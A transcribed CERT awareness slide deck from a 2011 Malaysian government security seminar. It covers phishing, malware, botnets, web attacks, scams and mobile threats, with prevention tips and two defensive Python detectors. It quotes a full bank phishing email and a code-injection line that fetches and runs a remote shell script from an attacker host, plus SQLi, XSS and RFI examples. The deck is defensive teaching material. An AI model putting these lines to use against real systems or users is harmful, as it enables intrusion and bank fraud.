Post on 30-Jan-2018
Ministry of Science, Technology & Innovation
Hacking Anatomy
Salahudin Wan Khairuzzaman
ICT Security Seminar 2011, Kementerian Kesihatan Malaysia (Ministry of Health Malaysia)
Securing Our Cyberspace
Copyright © 2009 CyberSecurity Malaysia
24/3/2011
Salahudin Wan Khairuzzaman GCIH, CEH, ENSA
Intrusion Analyst
Malaysia Computer Emergency Response Team (MyCERT)
Malware Research
Cyber Early Warning
LebahNet
Advisory and Alerts
Emerging Threats
Threats Visualization
MyCERT Statistics 2010 and Early 2011
Cyber999™
MyCERT – Emergency Services
Incidents Handled in 2010
Incidents Handled in 2011 (Jan-Feb)
Spam Emails in 2010
Spam Emails in 2011 (Jan-Feb)
Botnet drones & Malware Infection in 2010
Botnet drones & Malware Infection in 2010 (Jan-Feb)
Honeynet Project Incidents in 2010
Honeynet Project Incidents in 2011 (Jan-Feb)
Technical and Global Co-ordination
Technical Co-ordination
National Cooperation
Vendors
Law Enforcement, Authorities
Regulators
ISPs
Cyber Security Experts
MCMC
DELL
IBM
gcert
Technical Coordination Centre
International Collaboration
European Government CSIRTs Group (EGC)
European Network and Information Security Agency (ENISA)
MyCERT is an SC member
Organization of American States (OAS) CERT
Forum of Incident Response Teams
“OIC CYBER EMERGENCY RESPONSE TEAM”
OIC-CERT Task Force Member
Organization of Islamic Countries Computer Emergency Response Teams
Pakistan, Saudi, Tunisia, Malaysia, UAE, Indonesia, Nigeria, Morocco, Brunei, Bahrain, Bangladesh, Oman, Egypt, Qatar, Syria, Kuwait, Jordan, Turkey
Current Trend and Threats
Overview
• Phishing
• Malware
• Botnet
• Web Hacking
• Scam
• Client Side Attack
• Mobile Devices
What threat is this?
More examples..
Phishing
• Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication [source: Wikipedia]
• Still works today
• Targeting favourite banks in Malaysia / international
• Uses a long URL that masquerades as the original website
Phishing Methodology
[Diagram: steps 1 to 4 between Malicious Hackers, INTERNET, Victim, Real Website and Fake Website]
That’s the old phishing attack... Let’s see how hackers redefine their tactics
Same Phishing Methodology
[Diagram: steps 1 to 4 between Malicious Hackers, INTERNET, Victim, Real Website and Fake Website]
Phishing Redefined
We are hereby notifying you that we've recently suffered a DDos-Attack on one of
our's Online Banking server. For security reasons you must complete the next steps
to verify the integrity of your Maybank account. If you fail to complete the
verification in the next 24 hours your account will be suspended.
Here's how to get started:
1. Log in to Maybank online account (click here).
2. You must request for TAC via Maybank online banking - your TAC
will be sent via SMS to the mobile phone number you registered.
(you can find the "Request a TAC" button in the Utilities menu of
your account)
3. Logout from your account and close the browser.
4. When you have received the TAC (Transaction Authorization Code) on
your mobile phone, go to our secured verification server and
submit the requested information (Username, password and TAC).
to go on our secured server. (click here)
5. Please allow 48 hours for processing.
Please comply and thanks for understanding.
***This is an automated message, please do not reply***
https://www.maybank2u.com.my/mbb/m2u/common/M2ULogin.do
http://static-217-133-89-90.clienti.tiscali.it//
Phishing Website – Username, Password & Transaction Authorization Code
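A mail-filter style check for the e-mail above, as an added example that is not part of the original slides: it lists every link whose real target is not the bank's own host. It assumes the two URLs on the slide are the targets of the two "(click here)" links; the HTML sample, the trusted-host list and all function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the only host the bank serves its login page from,
# taken from the genuine URL shown on the slide.
TRUSTED_HOSTS = {"www.maybank2u.com.my"}

# Constructed sample: an HTML rendering of the e-mail above. Links 1 and 2 use
# the two URLs from the slide; link 3 is a constructed variant whose visible
# text shows the bank's URL while the href goes elsewhere.
SAMPLE_EMAIL = """
<p>1. Log in to Maybank online account
<a href="https://www.maybank2u.com.my/mbb/m2u/common/M2ULogin.do">(click here)</a>.</p>
<p>4. ... go to our secured verification server
<a href="http://static-217-133-89-90.clienti.tiscali.it//">(click here)</a></p>
<p><a href="http://static-217-133-89-90.clienti.tiscali.it//">
https://www.maybank2u.com.my/mbb/m2u/common/M2ULogin.do</a></p>
"""


class LinkCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:  # malformed authority part
        return ""


def audit_links(html, trusted_hosts=TRUSTED_HOSTS):
    """Return one finding per link that fails a check, with the reasons."""
    collector = LinkCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for href, text in collector.links:
        host = host_of(href)
        reasons = []
        if host not in trusted_hosts:
            reasons.append("host is not a trusted bank host")
        if not href.lower().startswith("https://"):
            reasons.append("link is not HTTPS")
        shows_url = text.lower().startswith(("http://", "https://"))
        if shows_url and host_of(text) != host:
            reasons.append("visible URL names a different host than the link")
        if reasons:
            findings.append({"href": href, "text": text, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_links(SAMPLE_EMAIL):
        print(finding["host"], "->", "; ".join(finding["reasons"]))
```

The first link passes because it points at the real login page, which is what makes this e-mail convincing; only the "verification server" links are reported.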
Phishing
Does it really work?
Prevention
Initiative from provider itself..
Phishing : Prevention
• Do not respond to e-mails requesting your personal information
• Do not open attachments or download files
• Do not click on links provided in e-mails.
• DontPhishMe add-ons in Mozilla Firefox and Chrome
o https://addons.mozilla.org/en-US/firefox/addon/dontphishme/
• Netcraft Anti-Phishing toolbar
o http://toolbar.netcraft.com/
• Report to MyCERT by forwarding the email to mycert@mycert.org.my
DontPhishMe
• Below is the list of supported online banking websites:
o Maybank2u
o Cimbclicks
o Public Bank
o Bank Rakyat
o Bank Islam
o HSBC
o EON Bank
o UOB
o AMBank
o OCBC
o RHB
o Citibank
o Standard Chartered Bank
o Al Rajhi Bank
o Affin Bank
DontPhishMe screenshots
What threat is this?
Malware
• A computer program created with malicious intent.
• It performs malicious tasks:
o Stealing your identity
o Key logging
o Disrupt system
o Damage data
o Attack other computers
• We can get infected by malware from almost everywhere:
o Web (drive-by download, web exploitation, Flash)
o Fake antivirus
o Email (email attachment, links)
o Files (PDF, DOC, JPEG, etc. [file exploitation])
o Video/MP3 (fake codec, file exploitation)
o Portable hard disk
o Errr.. your USB storage?
• Unpatched systems or systems with vulnerable applications easily become targets for malware.
• Malicious software includes:
o Trojan horse
o Virus
o Worms
A computer worm is a self-replicating malware computer program.
A Trojan horse is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.
A computer virus is a computer program that can copy itself and infect a computer.
Malware: What MyCERT Observed?
• MyCERT has collected more than 25K unique samples.
• Most of them are detected by antivirus software.
• Samples are collected using the honeypot concept (low interaction).
• Most likely coming from hosts that are infected by some sort of malware.
• Malware is normally distributed via IRC, FTP and HTTP
ThreatExpert geographic
VirusTotal statistics
Malware: Scenario (Conficker)
Malware : Conficker : What MyCERT Observed?
Top Country
Top .my Domain Requested
Current trends
• Targeted attacks
o Stuxnet is a Windows computer worm discovered in July 2010 that targets industrial software and equipment
o Spreads using infected removable drives such as USB flash drives
o Designed to target only Siemens Supervisory Control And Data Acquisition (SCADA) systems
o Targeting 5 Iranian organizations - probable target widely suspected to be uranium enrichment infrastructure in Iran.
Malware : Prevention
• Patch.. Patch.. Patch.. and Patch (OS & Applications)
• Make sure antivirus is installed and up-to-date
• Stay away from illegal/questionable sites
• Be careful with mail attachments!
• Be careful with ‘autorun’ thumb drives
• Report to MyCERT : mycert@mycert.org.my
Botnet
• A botnet is a collection of compromised computers (called zombie computers) running software, usually installed via worms, Trojan horses, or backdoors, under a common command-and-control (C&C) infrastructure.
• Used to perform DDoS, automated hacking, spamming, etc.
Botnet : Scenario
1. Botnet operator sends out viruses or worms
• infect ordinary users [trojan application is the bot]
2. The bot on the infected PC logs into an IRC server
• Server is known as the command-and-control server
3. Spammer gets access to botnet from operator
4. Spammer sends instructions to the infected PCs
5. Infected PCs send out spam messages
Botnet : DDoS
Web Hacking
Web Security Threats
RFI
CODE INJECTION
lala.php?Id=1&cmd=uname -a || wget hax0r.net/ipwn3du.sh && ./ipwn3du.sh && rm ipwn3du.sh
What threat is this?
Web Defacement
Web defacement is an attack on a website that changes the visual appearance of the site.
These are typically the work of a system cracker, who breaks into a web server and replaces the hosted website with one of their own.
A message is often left on the webpage along with a shout-out to his or her friends.
Web Hacking
When attackers successfully attack a website, they can:
o Change or view the disclosed information on the site
o Change account information, edit the database
o Remove the entire website, drop the database, etc.
o Deface the web pages
o Many more..
Web Hacking
Most common methods:
• RFI
o [ex. drop sites: =http://www.example/malicious-code.txt??]
• SQL Injection
o Union
o Select
o %20
o %27
• XSS - enables malicious attackers to inject client-side script into web pages viewed by other users
o <SCRIPT>alert("XSS")</SCRIPT>
What threat is this?
• This is what we see:
Remote File Inclusion + Steganography
• This is what the attacker has
Web Hacking : Prevention
• Patch.. Patch.. Patch.. and Patch (OS & Applications)
• Secure coding practice
o http://www.mycert.org.my/en/resources/web_security/main/main/detail/573/index.html
• Secure configurations
o Modified php.ini
o allow_url_include=off
o register_globals=off
• 3rd party applications (GreenSQL, PHP-IDS, ModSecurity, etc.)
• Web Application Firewall (WAF)
• Log analysis (from time to time)
• Report to MyCERT : mycert@mycert.org.my
Prevention : Network Design
• By having proper network design/firewall rules, we can reduce the threat as well:
o DMZ (web server) is not allowed to connect using the IRC protocol
o DMZ (web server) is not allowed to establish connections to unknown sites/FTP servers
o DMZ (web server) is not allowed to establish connections to search engines
o Proxied web server?
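The "Log analysis" item in the prevention list above, applied to the three common methods this deck names (RFI, SQL injection, XSS), as an added example that is not part of the original slides. The log lines are constructed (documentation IP ranges, hypothetical script names) and the rule set is an assumption built only from the indicators listed on the slides.

```python
import re
from urllib.parse import parse_qsl

# Common/combined access-log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# One rule per method named on the slides; each runs on a decoded parameter value.
RULES = [
    # RFI: the parameter value is itself a remote URL.
    ("RFI", re.compile(r"^\s*(?:https?|ftp)://", re.I)),
    # SQLi: UNION ... SELECT, or a single quote (%27). The quote rule is noisy
    # (names such as O'Brien), so treat it as a lead to review, not a verdict.
    ("SQLi", re.compile(r"\bunion\b.+\bselect\b|'", re.I)),
    # XSS: a <SCRIPT> tag inside a parameter.
    ("XSS", re.compile(r"<\s*script\b", re.I)),
]

# Constructed sample log; the first line reuses the RFI example from the slide.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Mar/2011:10:01:02 +0800] "GET /index.php?page=http://www.example/malicious-code.txt?? HTTP/1.1" 200 512
198.51.100.7 - - [24/Mar/2011:10:02:15 +0800] "GET /news.php?id=1%20UNION%20SELECT%201,2 HTTP/1.1" 200 1024
198.51.100.7 - - [24/Mar/2011:10:02:40 +0800] "GET /news.php?id=1%27 HTTP/1.1" 500 87
203.0.113.5 - - [24/Mar/2011:10:03:11 +0800] "GET /search.php?q=%3CSCRIPT%3Ealert(%22XSS%22)%3C/SCRIPT%3E HTTP/1.1" 200 640
192.0.2.44 - - [24/Mar/2011:10:04:00 +0800] "GET /news.php?id=42 HTTP/1.1" 200 2048
"""


def scan_line(line):
    """Return a list of rule hits for one access-log line."""
    match = LINE_RE.match(line)
    if not match:
        return []  # not a request line this parser understands
    _, _, query = match.group("target").partition("?")
    hits = []
    # parse_qsl percent-decodes once, so %27 becomes ' and %20 becomes a space.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.append({
                    "rule": rule,
                    "ip": match.group("ip"),
                    "param": name,
                    "value": value,
                    "status": int(match.group("status")),
                })
    return hits


def scan_log(lines):
    """Scan many lines and tag each hit with its 1-based line number."""
    report = []
    for number, line in enumerate(lines, 1):
        for hit in scan_line(line):
            report.append(dict(hit, line=number))
    return report


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit["line"], hit["ip"], hit["rule"], hit["param"], repr(hit["value"]), hit["status"])
```

Access logs record only the query string, so payloads sent in POST bodies need a WAF or application-level logging to be seen.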
What threat is this?
• Dear Sir/Madam, Congratulations! We are pleased to announce you as one of the 3 lucky winners in the FLASH MEGA LOTTERY draw held today. All 3 winning addresses were randomly selected from a batch of 5,000,000 international emails. Your email address emerged alongside to others as a 3rd category winner in this month's draw. Consequently, you have therefore been approved for a total pay out of $1,950,000.00 Dollars (One Million Nine Hundred and Fifty Thousand United State Dollars) only.
Scam
• May be related to phishing
• Nigerian or Russian scam
• Normally through email with title “From the desk of Mr [name]” or “Your Assistance is needed”
• Email hijacking / friends scams
• Purchasing goods and online.
• Lottery scam.
• Pet scam.
• Fake job offer.
• Etc.. You name it!
Prevention
• Do not expose your 16-digit card number
• Customer Card ID Number (CID or CVV2 number)
• Expiry Date
• This scam is normally through phone.
• Google your full name to protect your information.
• Do not respond to anonymous e-mail
• Bill Gates doesn’t give free iPods through the internet.
• Make sure you follow up on any process or procedures.
• http://www.hoax-slayer.com/
Hoax-Slayer is dedicated to debunking email hoaxes, thwarting Internet scammers, combating spam, and educating web users about email and Internet security issues
What’s now/next?
Client Side Attack
• Targets vulnerabilities in client applications that interact with a malicious server or process malicious data.
• Common targets:
o Browser (IE, Firefox, Chrome, Safari)
o PDF Reader (Adobe Acrobat, Foxit)
o Flash Player
o Multimedia Plugin (Java, QuickTime, ActiveX)
o Microsoft Office Apps (Excel, PowerPoint)
• Used in ‘Targeted Attack’
o Scenario: Receive file with attachment from boss
• Normally uses current propaganda to conduct social engineering:
o US Presidential Election
o Tibetan Movement
o Pharmacy spam
o Swine Flu
o Michael Jackson
Client Side Attack : Acrobat Reader (1)
Client Side Attack : Acrobat Reader (2)
Client Side Attack : Advisories 2010
• MA-261.122010: MyCERT Alert - Critical Vulnerability in Microsoft Internet Explorer
• MA-257.112010: Multiple Critical Vulnerabilities in Adobe Reader
• MA-256.112010: Critical Vulnerability in Microsoft Internet Explorer
• MA-255.102010: MyCERT Alert - Critical Vulnerability in Adobe Flash Player
• MA-254.102010: MyCERT Alert - Critical vulnerability in Mozilla Firefox
• MA-253.102010: MyCERT Alert - Critical Vulnerability in Adobe Shockwave Player
• MA-252.102010: MyCERT Alert - Multiple Critical Vulnerabilities in Oracle Java SE and Java for Business
• MA-250.092010: MyCERT Alert - Critical Vulnerability in Adobe Flash Player
• MA-249.092010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader
• MA-246.082010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Shockwave Player
• MA-245.082010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader
• MA-243.082010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Flash Player
• MA-242.082010: MyCERT Alert - Latest Patch for Microsoft Vulnerabilities (August 2010)
• MA-234.062010: MyCERT Alert - Critical Vulnerabilities in Adobe Flash Player, Adobe Reader and Acrobat
• MA-232.052010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Shockwave Player
• MA-230.052010: MyCERT Alert - Critical Vulnerability in Safari Web Browser
• MA-229.042010: MyCERT Advisory - Vulnerability in Microsoft Sharepoint Could Allow Elevation of Privilege
• MA-226.042010: MyCERT Alert - Multiple Critical Vulnerability in Adobe Acrobat and Reader
• MA-225.042010: MyCERT Alert - Oracle JRE Java Platform SE and Java Deployment Toolkit Plugins Code Execution Vulnerabilities
• MA-221.032010: MyCERT Alert – Critical Vulnerability in Microsoft Internet Explorer
• MA-218.032010: MyCERT Alert - Microsoft Windows Help File Code Execution Vulnerability Within Internet Explorer via VBScript
• MA-217.022010: MyCERT Alert - Critical Vulnerability in Adobe Download Manager
• MA-216.022010: MyCERT Alert - Critical Vulnerability in Adobe Acrobat and Adobe Reader
• MA-214.022010: MyCERT Alert - Information disclosures vulnerabilities in Internet Explorer
• MA-212.012010: MyCERT Alert - Google Chrome Multiple Critical Vulnerabilities
Client Side Attack : Prevention
• Patch.. Patch.. Patch.. and Patch (OS & Applications)
• Make sure antivirus is installed and up-to-date
• Be careful with mail attachments and URLs!
• Stay away from questionable sites
• Use extra protection :) (Firewall, F-Secure Exploit Shield, Google Safe Browsing API (about:config))
• Report to MyCERT : mycert@mycert.org.my
Google Safe Browsing API
Mobile Devices
• Target mobile phones with a specific operating system
• Very recent
• Attacking method:
o SMS
o MMS
o Attachment
o Bluetooth
o Warez/free applications downloaded (not official)
Mobile Devices : Transmitter.C (malware)
Mobile Malware
Skull.D, Commwarrior, Blankfont, Doomboot
Mobile Malware (cont’d)
Mobile Devices
• Affected products:
o iPhone (Safari browser)
o Symbian (SMS, MMS, Warez, File)
o Windows Mobile [HTC] (Bluetooth, Warez)
o BlackBerry (Attachment)
o Android devices
Mobile Devices : Advisories
• MA-177.072009: MyCERT Alert - 0day in HTC (Windows Mobile) OBEX FTP Service - Directory Traversal
• MA-176.072009: MyCERT Alert - 0day in Symbian S60 (Nokia) Firmware Media Codecs - Multiple Memory Corruption Vulnerabilities
• MA-174.072009: MyCERT Alert - Transmitter.C Mobile Malware Advisory
• MA-193.092009: MyCERT Alert - Critical Vulnerability in iPhone and iPod Touch Operating System
• MA-213.022010: MyCERT Alert - Latest Security Update for iPhone OS and iPod Touch (February 2010)
• MA-274.032011: MyCERT Alert - Critical Vulnerability in Webkit Browser Engine for BlackBerry
Client Side Attack : Prevention
• Patch.. Patch.. Patch.. and Patch (if available)
• Do not open questionable SMS, MMS or files
• Do not browse to unknown websites received via SMS or MMS from known or unknown persons
• Do not download and install unknown or untrusted third party applications that are uploaded to websites and forums
• Do not accept pairing or connection requests from unknown sources
• It is recommended to use antivirus
• Report to MyCERT : mycert@mycert.org.my
Google search tips
• “keywords” filetype:doc
• “keywords” site:my
• “keywords” inurl:google.com
• “keywords” inurl:phpmyadmin
• Phrase search “ “
• Calculator
• Currency Converter
• word1 OR word2 -- finds pages that include either word
• word1 AND word2 -- finds pages that include both words
• Term you want to exclude (-) (e.g. word1 -word2)
• Term you want to include (+) (e.g. word1 +word2)
Conclusion
Small Issues
BIG Problem
Security is OUR Responsibility
Mode of Incident Referrals
1. Email: cyber999@cybersecurity.my, mycert@mycert.org.my
2. Phone: +603 8992 6969, +1300-88-2999
3. Fax: +603 8945 3442
4. SMS: +6019 281 3801
5. Mobile (24x7): +6019 266 5850
6. Online – http://www.mycert.org.my
Office Hours – MYT 0830 - 1730
Q & A
THANK YOU
Our Websites and emails
salahudin@cybersecurity.my
mycert@mycert.org.my
cyber999@cybersecurity.my → for incident reporting
info@cybersecurity.my → for general inquiries
Our Corporate Website: http://www.cybersecurity.my
Technical website: http://www.mycert.org.my
Awareness Portal: http://www.esecurity.org.my
http://cnii.cybersecurity.my